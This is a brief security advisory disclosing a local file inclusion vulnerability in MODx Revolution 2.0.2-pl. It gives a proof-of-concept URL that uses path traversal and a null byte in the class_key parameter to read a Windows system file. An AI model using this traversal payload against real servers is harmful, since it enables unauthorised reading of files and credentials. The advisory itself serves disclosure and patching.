------------------------------------------------------------------------
Software................MODx Revolution 2.0.2-pl
Vulnerability...........Local File Inclusion
Download................http://modxcms.com
Release Date............9/28/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in MODx Revolution 2.0.2-pl can
be exploited to include arbitrary files.


--PoC--

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00